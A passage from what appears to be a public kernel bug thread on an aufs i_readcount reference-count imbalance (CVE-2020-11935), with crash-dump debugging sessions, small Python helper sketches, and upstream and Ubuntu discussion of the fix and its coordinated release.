crash> < crash.struct-au_sbinfo_bend_branch.script | tee crash.struct-au_sbinfo_bend_branch.output | awk '/si_bend =/ { bend=$3 } /si_branch =/ { br=$3; print "rd -64", br, bend }' > crash.rd-64-si_branch-si_bend.script

4) For each si_branch, output commands to print its dentry (i.e., directory on disk used by this branch)

crash> < crash.rd-64-si_branch-si_bend.script | tee crash.rd-64-si_branch-si_bend.output | grep -v '^crash>' | cut -d: -f2- | grep -wo '[0-9a-f]\{16\}' | sed 's/^/struct au_branch.br_path.dentry /' > crash.au_br.br_path.dentry.script

5) For each dentry, output commands to print its name (i.e., name of the directory)

crash> < crash.au_br.br_path.dentry.script | tee crash.au_br.br_path.dentry.output | awk '/br_path.dentry =/ { print "struct dentry.d_name.name", $3 }' > crash.dentry-d_name-name.script

6) Run those commands, and save the names of the directories.

crash> < crash.dentry-d_name-name.script > crash.dentry-d_name-name.output
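
Each "shell glue" step above turns one command's output into the
next batch of commands. The awk part of steps 2 and 5 can be
sketched generically as below; the function name is made up, and
the sample text is the step-1 output shown further down in this
comment.

```python
def next_commands(output, field, template):
    """For every 'field = value' line, emit template filled with value.

    Mirrors: awk '/field =/ { print "<command>", $3 }'
    """
    cmds = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == field and parts[1] == "=":
            cmds.append(template.format(parts[2]))
    return cmds


STEP1_OUTPUT = """\
crash> struct super_block.s_fs_info ffff883f63ee8800
  s_fs_info = 0xffff887f5ecdd000
"""

step2_script = next_commands(
    STEP1_OUTPUT, "s_fs_info", "struct au_sbinfo.si_bend,si_branch {}"
)
print("\n".join(step2_script))
```

Keeping the intermediate .output files (the tee in each step) is
what makes it possible to walk back from a value to the command
that produced it.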

Backtracking through the intermediary .output files
(which contain the command used to generate output)
from the branch directory we're after, up until its
superblock:

The branch hash is 7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558,
from the path:

/opt/k8s/docker/aufs/diff/7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558/etc/protocols

1) Find the dentry with that name:

$ grep -B1 7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558 crash.dentry-d_name-name.output
    crash> struct dentry.d_name.name 0xffff883f5d747b00
      d_name.name = 0xffff883f4e892b50 "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"

2) Find the au_branch with that dentry:

$ grep -B1 0xffff883f5d747b00 crash.au_br.br_path.dentry.output
    crash> struct au_branch.br_path.dentry ffff887f61fcc800
      br_path.dentry = 0xffff883f5d747b00

3) Find the au_branch array with that au_branch:

$ grep -B2 ffff887f61fcc800 crash.rd-64-si_branch-si_bend.output
    crash> rd -64 0xffff883f4dd773c0 0x4
    ffff883f4dd773c0:  ffff887f61fce600 ffff887f61fcc600   ...a.......a....
    ffff883f4dd773d0:  ffff887f61fcc700 ffff887f61fcc800   ...a.......a....

4) Find the au_sbinfo with that au_branch array:

$ grep -B2 0xffff883f4dd773c0 crash.struct-au_sbinfo_bend_branch.output
    crash> struct au_sbinfo.si_bend,si_branch 0xffff887f5ecdd000
      si_bend = 0x4
      si_branch = 0xffff883f4dd773c0

5) Find the super_block with that au_sbinfo:

$ grep -B1 0xffff887f5ecdd000 crash.struct-sb-s_fs_info.output
    crash> struct super_block.s_fs_info ffff883f63ee8800
      s_fs_info = 0xffff887f5ecdd000

6) And that super_block / mount is:

crash> mount | grep ffff883f63ee8800
    ffff887f5ecc7000 ffff883f63ee8800 aufs   none      /opt/bb/docker/aufs/mnt/7740aebe2a1a983b5b703067fc04455a33ce42942f6f930f426f62552a70b958
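
The chain of 'grep -B' lookups above can also be scripted. A rough
sketch, assuming each .output file interleaves "crash> command"
lines with their output as shown; the helper names are made up and
the texts are the excerpts quoted in steps 1-5.

```python
HASH = "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"

NAMES = 'crash> struct dentry.d_name.name 0xffff883f5d747b00\n' \
        '  d_name.name = 0xffff883f4e892b50 "' + HASH + '"\n'
DENTRY = "crash> struct au_branch.br_path.dentry ffff887f61fcc800\n" \
         "  br_path.dentry = 0xffff883f5d747b00\n"
RD = "crash> rd -64 0xffff883f4dd773c0 0x4\n" \
     "ffff883f4dd773c0:  ffff887f61fce600 ffff887f61fcc600\n" \
     "ffff883f4dd773d0:  ffff887f61fcc700 ffff887f61fcc800\n"
SBINFO = "crash> struct au_sbinfo.si_bend,si_branch 0xffff887f5ecdd000\n" \
         "  si_bend = 0x4\n  si_branch = 0xffff883f4dd773c0\n"
SB = "crash> struct super_block.s_fs_info ffff883f63ee8800\n" \
     "  s_fs_info = 0xffff887f5ecdd000\n"


def command_before(output, needle):
    """Return the last 'crash>' command preceding an output line with needle."""
    last_cmd = None
    for line in output.splitlines():
        text = line.strip()
        if text.startswith("crash>"):
            last_cmd = text[len("crash>"):].strip()
        elif needle in text:
            return last_cmd
    return None


def backtrack(needle, steps):
    """steps: (output text, index of the address token in the command)."""
    for output, arg_index in steps:
        cmd = command_before(output, needle)
        if cmd is None:
            raise LookupError(needle)
        needle = cmd.split()[arg_index]
    return needle


# 'rd -64 <addr> <count>' carries its address in token 2, the rest in the last.
superblock = backtrack(
    HASH, [(NAMES, -1), (DENTRY, -1), (RD, 2), (SBINFO, -1), (SB, -1)]
)
print(superblock)
```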

Part 5.2) Checking the libc.so dentry/inode
and its backing inode i_readcount value.

Navigating through the:
-> aufs superblock
-> root dentry -> subdirs
-> lib dentry -> subdirs
-> x86_64-linux-gnu dentry -> subdirs
-> libc-*.so dentry -> backing dentry/inode

- root dentry/subdirs:

crash> * super_block.s_root ffff883f63ee8800
      s_root = 0xffff883f61805140

crash> * -o dentry.d_subdirs 0xffff883f61805140
    struct dentry {
      [ffff883f618051e0] struct list_head d_subdirs;
    }

- lib dentry/subdirs:

crash> list -s dentry.d_name.name -l dentry.d_child -H ffff883f618051e0 | grep -B1 -w lib
    ffff887f4e423e90
      d_name.name = 0xffff887f4e423e38 "lib"

crash> * -o dentry.d_subdirs -l dentry.d_child ffff887f4e423e90
    struct dentry {
      [ffff887f4e423ea0] struct list_head d_subdirs;
    }

- x86_64-linux-gnu dentry/subdirs:

crash> list -s dentry.d_name.name -l dentry.d_child -H ffff887f4e423ea0 | grep -B1 x86_64-linux-gnu
    ffff887f4e420990
      d_name.name = 0xffff887f4e420938 "x86_64-linux-gnu"

crash> * -o dentry.d_subdirs -l dentry.d_child ffff887f4e420990
    struct dentry {
      [ffff887f4e4209a0] struct list_head d_subdirs;
    }

- libc-*.so file

crash> list -s dentry.d_name.name -l dentry.d_child -H ffff887f4e4209a0 | grep -B1 'libc-.*so'
    ffff887f4e75c090
      d_name.name = 0xffff887f4e75c038 "libc-2.24.so"

Checking that its superblock matches the above (yes),
and that its inode file operations are from aufs (yes):

crash> * dentry.d_sb -l dentry.d_child ffff887f4e75c090
      d_sb = 0xffff883f63ee8800

crash> * dentry.d_inode -l dentry.d_child ffff887f4e75c090
      d_inode = 0xffff887f4e768358

crash> * inode.i_fop 0xffff887f4e768358
      i_fop = 0xffffffffc02c1ce0 <aufs_file_fop>

Now, navigating through the aufs structures linked from
the dentry in aufs to the dentry/inode in the underlying
filesystem/disk.

The dentry.d_fsdata field points to:

- aufs struct au_dinfo (dentry info)

crash> * -x dentry.d_fsdata -l dentry.d_child ffff887f4e75c090
      d_fsdata = 0xffff887f4e75e000

Which points to an array of aufs struct au_hdentry (host/hard? dentry)

- aufs struct au_hdentry array pointed by au_dinfo.di_hdentry
(with di_bend+1 elements, of size 0x10)

crash> * -x au_dinfo.di_hdentry,di_bstart,di_bend 0xffff887f4e75e000
      di_hdentry = 0xffff887f50644000
      di_bstart = 0x4
      di_bend = 0x4

crash> * -x au_hdentry
    struct au_hdentry {
        struct dentry *hd_dentry;
        aufs_bindex_t hd_id;
    }
    SIZE: 0x10

And looking at the elements up to index 0x4 (i.e., at offset 0x4*0x10):

crash> * -x au_hdentry.hd_dentry 0xffff887f50644000
      hd_dentry = 0x0

crash> * -x au_hdentry.hd_dentry 0xffff887f50644010
      hd_dentry = 0x0

crash> * -x au_hdentry.hd_dentry 0xffff887f50644020
      hd_dentry = 0x0

crash> * -x au_hdentry.hd_dentry 0xffff887f50644030
      hd_dentry = 0x0

crash> * -x au_hdentry.hd_dentry 0xffff887f50644040
      hd_dentry = 0xffff887f4e75c300
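
The element addresses used above are plain array arithmetic on
the di_hdentry pointer. A small sketch using the values from this
session (the helper name is made up; the element size is the SIZE
reported by crash for struct au_hdentry):

```python
AU_HDENTRY_SIZE = 0x10  # SIZE reported by crash for struct au_hdentry


def hdentry_address(di_hdentry, bindex, elem_size=AU_HDENTRY_SIZE):
    """Address of element 'bindex' in the au_hdentry array."""
    return di_hdentry + bindex * elem_size


# di_bstart == di_bend == 0x4, so only that element is populated here.
addr = hdentry_address(0xffff887f50644000, 0x4)
print(hex(addr))  # 0xffff887f50644040
```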

And this points to the dentry on the real filesystem.

crash> struct dentry.d_name.name 0xffff887f4e75c300
      d_name.name = 0xffff887f4e75c338 "libc-2.24.so"

And finally, looking at the backing inode:

crash> struct dentry.d_inode 0xffff887f4e75c300
      d_inode = 0xffff887f4e7701d0

crash> struct inode.i_readcount.counter 0xffff887f4e7701d0
      i_readcount.counter = 11247257

We can see it's fairly unbalanced towards a large number.

And it's the _TOP 3_ i_readcount value observed up above!
(which is expected, as libc is definitely opened often.)

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#13

aufs-intro-i_readcount_inc (8.8 KiB, text/plain)

Analysis/history of the aufs change back in Linux v2.6.39.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#14

xfstests_aufs.patch (5.1 KiB, text/plain)

Patch for xfstests-dev to use aufs with the overlayfs suite.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#15

I'm happy to send patches for Ubuntu releases if needed
(and Debian and aufs upstream, for that matter),

Just not yet aware which (private) mailing list/channel
should be used, and how/which coordination is required.

Mauricio Faria de Oliveira (mfo) on 2020-04-16

tags:

added: sts

J. R. Okajima (hooanon05) wrote on 2020-06-17:

#16

a.patch (1.4 KiB, text/plain)

Mauricio,

Thank you for notifying me (as an upstream developer) and for your
thorough analysis.
Your patch is good, but it didn't pass my local test. Because the test
has a case "branch manipulation: change the branch permission RW to RO."
The test is for an aufs specific feature which enables users to change
the permission of a branch (layer) dynamically. The one RW plus one or
more RO layers case is common, but users can have multiple RW layers and
change them into RO layers without unmounting aufs.

So I added another fix over yours and I am testing it now. It will take
several days.

J. R. Okajima (hooanon05) wrote on 2020-06-17: Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

#17

"J. R. Okajima":
> So I added another fix over yours and I am testing it now. It will take
> several days.

Ah, I should have written more.
"several days" in the above sentence means my regular test takes a long
time. It doesn't mean I can try your "multiple" parameter using kprobe
test. The test looks very effective, so if you can, please try it for
my patch in previous post. Obviously it does no harm unless you try
"mount -o remount,mod:/your/rw/branch=ro".

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-17:

#18

Hi J. R. Okajima,

Good point. I recall that code path to change branches to read-only.

It's not exercised in the several tests I've done (for most common
scenarios.) Thanks for the additional testing.

It was a strong suspect early on, because it changes the underlying
inode's open file mode to read-only, and then an unbalance happens:

because the file was opened in read-write mode (no i_readcount_inc),
and after being changed to read-only, on close it gets an i_readcount_dec.
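
A toy model of that imbalance, as a sketch only. It assumes the
VFS increments i_readcount only for read-only opens and decrements
only when the file is read-only at close. The 'compensate' switch
shows one possible way to rebalance (an increment at the time of
the mode change); whether that matches the actual aufs patch is
an assumption.

```python
class Inode:
    def __init__(self):
        self.readcount = 0


class File:
    def __init__(self, inode, read_only):
        self.inode = inode
        self.read_only = read_only


def vfs_open(inode, read_only):
    if read_only:
        inode.readcount += 1  # counted only for read-only opens
    return File(inode, read_only)


def vfs_close(f):
    if f.read_only:
        if f.inode.readcount == 0:
            raise RuntimeError("BUG: i_readcount decrement at zero")
        f.inode.readcount -= 1


def flip_to_read_only(f, compensate):
    """Branch RW -> RO while the file is still open."""
    f.read_only = True
    if compensate:
        f.inode.readcount += 1  # hypothetical rebalancing step


inode = Inode()
f = vfs_open(inode, read_only=False)   # opened RW: no increment
flip_to_read_only(f, compensate=True)
vfs_close(f)
print(inode.readcount)                 # balanced again
```

With compensate=False the same sequence raises on close, because
the decrement has no matching increment.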

I remember the code having warnings that IMA messages could happen
if that is done in aufs; and possibly for this exact reason/change.

I'm not an aufs expert, but I think it's still wrong for aufs to
mess with the file mode of an already open file in the underlying
filesystem, and trying to remedy the failure as a result of that
by messing with the readcount again, under the covers.

Maybe another approach is to close the file if opened in RW mode,
and reopen in RO mode? so that the VFS continues to take care of
the i_readcount value, and aufs doesn't have to play tricks here.

(not sure if that is possible, i don't remember how aufs keeps
the access/syscalls from users of that file; but maybe it is
worth looking at it. -- and if it's too hard to do/doesn't make
sense, then maybe messing with the i_readcount under the hood
is what works for the time being. :)

Hope this helps,
Mauricio

J. R. Okajima (hooanon05) wrote on 2020-06-17:

#19

Mauricio Faria de Oliveira:
> I'm not an aufs expert, but I think it's still wrong for aufs to
> mess with the file mode of an already open file in the underlying
> filesystem, and trying to remedy the failure as a result of that
> by messing with the readcount again, under the covers.

Aufs is an ordinary filesystem which is a callee of VFS, at the same
time aufs is a caller of VFS for the branch/layer filesystems. So aufs
handles i_readcount on behalf of VFS.

> Maybe another approach is to close the file if opened in RW mode,
> and reopen in RO mode? so that the VFS continues to take care of
> the i_readcount value, and aufs doesn't have to play tricks here.

Re-open cannot be an option. It will destroy the file lock, file
position or any other file internal parameters.

J. R. Okajima

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-17:

#20

Right, I think I see your point. Even though it's an ordinary filesystem
as a callee of VFS, it is not as a caller (since most filesystems don't
do that), and in this role, it might have to do non-ordinary things too.

Thanks for clarifying that re-open is not an option. I imagined these
attributes were kept at the aufs file, and that the underlying fs file
was not that related. (as I mentioned, I'm not an aufs expert, nor fs
expert, for that matter.)

In general, i_readcount_inc/dec() outside of VFS is likely not the
"right" thing to do, but this particular case is far from "general"
(given the operation: to change an entire branch/layer RW->RO; and
being an union/layer filesystem; and while files are still open.)

... so I guess there is the "doable" thing to do, right? :)

Thanks for the patch!

J. R. Okajima (hooanon05) wrote on 2020-06-19:

#21

Mauricio Faria de Oliveira:
> ... so I guess there is the "doable" thing to do, right? :)

Well, my local tests are still going on. If everything goes well, I'd
like to release this fix on next Monday (in my local timezone). If
security guys here want me to wait, let me know as soon as possible.

By the way, I've found there is an almost identical commit in the aufs5
repositories.
1d26f910c53fa 2019-08-03 aufs: for v5.3-rc1, maintain i_readcount

J. R. Okajima

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-19:

#22

Hi J. R. Okajima,

> If security guys here want me to wait, let me know as soon as possible.

I'll mention that in the email thread we're all on.

Not sure if this is sufficient notice time for some,
as it's already weekend or really close on some TZs.

Hopefully it is, and the thinking is OK to release.

J. R. Okajima (hooanon05) wrote on 2020-06-19:

#23

Mauricio Faria de Oliveira:
> Not sure if this is sufficient notice time for some,
> as it's already weekend or really close on some TZs.

I see.
Then I'll wait a few more days.

J. R. Okajima

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-19:

#24

That should help; thank you!

Seth Arnold (seth-arnold) wrote on 2020-06-25:

#25

Please use CVE-2020-11935 for the reference count issue.

Thanks

J. R. Okajima (hooanon05) wrote on 2020-06-29: Fwd: aufs4 and aufs5 GIT release (v5.7)

#26

------- Forwarded Message

From: "J. R. Okajima" <email address hidden>
To: <email address hidden>
Subject: aufs4 and aufs5 GIT release (v5.7)
Date: Mon, 29 Jun 2020 10:32:38 +0900
Message-ID: <2412.1593394358@jrobl>

o news
- linux-v5.7 is released. so is aufs5.7 branch.
  aufs5.8-rcN is not started yet.

o bugfix
- do not call i_readcount_inc(), reported and fixed by Mauricio Faria de
  Oliveira.
- related to above, fix IMA i_readcount.

J. R. Okajima

----------------------------------------
- aufs4-linux.git
  aufs: bugfix, IMA i_readcount
  aufs: do not call i_readcount_inc()

- aufs4-standalone.git
  ditto

- aufs5-linux.git
  ditto

- aufs5-standalone.git
  ditto

- aufs-util.git
  nothing

------- End of Forwarded Message

Mauricio Faria de Oliveira (mfo) on 2020-06-29

Changed in linux (Ubuntu):
status:	New → In Progress
Changed in linux (Ubuntu Bionic):
status:	New → In Progress
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status:	New → Won't Fix
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Focal):
status:	New → In Progress
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Groovy):
status:	In Progress → Won't Fix
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu):
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)

Mauricio Faria de Oliveira (mfo) on 2020-06-29

description:	updated

Mauricio Faria de Oliveira (mfo) on 2020-06-29

Changed in linux (Ubuntu Eoan):
status:	Won't Fix → In Progress
description:	updated

Mauricio Faria de Oliveira (mfo) on 2020-06-29

description:

updated

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-29:

#27

[X/B/D/E][PATCH 0/2] aufs: fixes for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111578.html

[F/G/Unstable][PATCH 0/1] aufs: fix for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111581.html

Alex Murray (alexmurray) wrote on 2020-07-09:

#28

This is public in the Ubuntu CVE Tracker so making the bug public too.

information type:

Private Security → Public Security

Ubuntu Foundations Team Bug Bot (crichton) on 2020-07-09

tags:

added: patch

Mauricio Faria de Oliveira (mfo) on 2020-07-22

Changed in linux (Ubuntu Bionic):
status:	In Progress → Fix Released
Changed in linux (Ubuntu Focal):
status:	In Progress → Fix Released
Changed in linux (Ubuntu Xenial):
status:	New → Fix Released
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status:	In Progress → Fix Committed

Mauricio Faria de Oliveira (mfo) wrote on 2020-07-22:

#29

Marking as fix released for X/B/F on kernel packages versions:
- Xenial: 4.4.0-186.216
- Bionic: 4.15.0-112.113
- Focal: 5.4.0-42.46

Covered in USNs:
https://usn.ubuntu.com/4425-1
https://usn.ubuntu.com/4426-1
https://usn.ubuntu.com/4427-1

Brian Murray (brian-murray) wrote on 2020-08-18:

#30

The Eoan Ermine has reached end of life, so this bug will not be fixed for that release

Changed in linux (Ubuntu Eoan):
status:	Fix Committed → Won't Fix

Peter Burkholder (peterburkholder) wrote on 2020-10-21:

#31

This CVE still shows up as "Reserved" at https://nvd.nist.gov/vuln/detail/CVE-2020-11935 and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11935.

Is there an approval/publication step that y'alls still need to take?

Thanks, Peter

Seth Arnold (seth-arnold) wrote on 2020-10-21: Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

#32

On Wed, Oct 21, 2020 at 10:32:14PM -0000, Peter Burkholder wrote:
> Is there an approval/publication step that y'alls still need to take?

Yes, there is; it's been a busy, uh, three months give or take.

Thanks for the friendly reminder. :)

Mauricio Faria de Oliveira (mfo) on 2022-09-14

Changed in linux (Ubuntu):
status:	In Progress → Fix Released
